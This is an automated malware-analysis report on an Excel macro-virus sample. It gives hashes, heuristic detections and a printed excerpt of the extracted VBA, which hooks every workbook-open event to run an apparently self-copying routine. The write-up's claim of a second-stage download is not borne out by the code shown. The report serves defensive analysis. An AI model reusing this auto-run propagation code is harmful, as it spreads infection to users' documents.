Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8928bb6a0f182e3b…

MALICIOUS

Office (OLE)

126.0 KB Created: 2009-06-23 15:09:09 Authoring application: Microsoft Excel First seen: 2015-10-03
MD5: 7adcc2c5051d3a39db5a1a724d2951f0 SHA-1: 94a6cbf7a887bb580d43b4cfff9b2c8830a3044a SHA-256: 8928bb6a0f182e3b80961e99500b105eda0b30f5543bf0dfd14f3444f9cdce3c
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing a Workbook_Open VBA macro. This macro is designed to execute arbitrary code upon opening, indicated by the 'Shell' execution token in the heuristic firings. The macro's primary function appears to be downloading and executing a second-stage payload, although the specific download URL or execution command is not directly present in the provided script. The presence of a Workbook_Open macro and the execution of arbitrary code strongly suggest a malicious intent, likely delivered via spearphishing.

Heuristics 4

  • ClamAV: Xls.Virus.Mailcab-6702020-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Virus.Mailcab-6702020-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1120 bytes
SHA-256: 733eb43661d2ef0e54d7636555815dc20980ceef4c75866b2942458d446aaab2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call do_what
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
copystart wb
Application.ScreenUpdating = True
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.